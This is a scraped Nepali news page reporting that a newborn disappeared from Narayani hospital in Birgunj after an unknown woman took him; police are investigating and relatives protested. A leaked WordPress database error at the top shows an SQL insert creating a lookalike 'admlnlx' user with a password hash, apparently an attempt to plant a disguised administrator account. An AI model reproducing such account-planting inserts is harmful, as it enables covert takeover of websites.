WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhZKZTVly9BWDa4u9CN27/G2Njbs/t/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 10:39:01', '', 'admlnlx', 'admlnlx')
वीरगन्ज, माघ २१–
नारायणी उपक्षेत्रीय अञ्चल अस्पताल वीरगन्जबाट जन्मेको तीन घन्टाभित्र एक नवजात शिशु बेपत्ता भएको छ ।
जिल्ला प्रहरी कार्यालय पर्साका अनुसार वीरगन्ज उपमहानगरपालिका–१ छपकैया बस्ने मुकेश पासवानकी श्रीमती आशादेवीले आज बिहान १०:३० बजे छोरालाई जन्म दिएकी थिइन् ।
करिब साढे १ बजे नवजात शिशु रुन थालेपछि अपरिचित एक महिलाले खेलाउने बहानामा उसलाई लिएर भागेकी थिइन् । सो महिला को थिइन् र शिशुलाई लिएर कहाँ गइन् भन्नेबारेमा प्रहरीले अनुसन्धान गरिरहेको छ ।
अस्पताल व्यवस्थापनको लापरबाहीका कारण शिशु बेपत्ता भएको आफन्तले आरोप लगाउँदै केहीबेर विरोध तथा नारा जुलुस गरेका थिए ।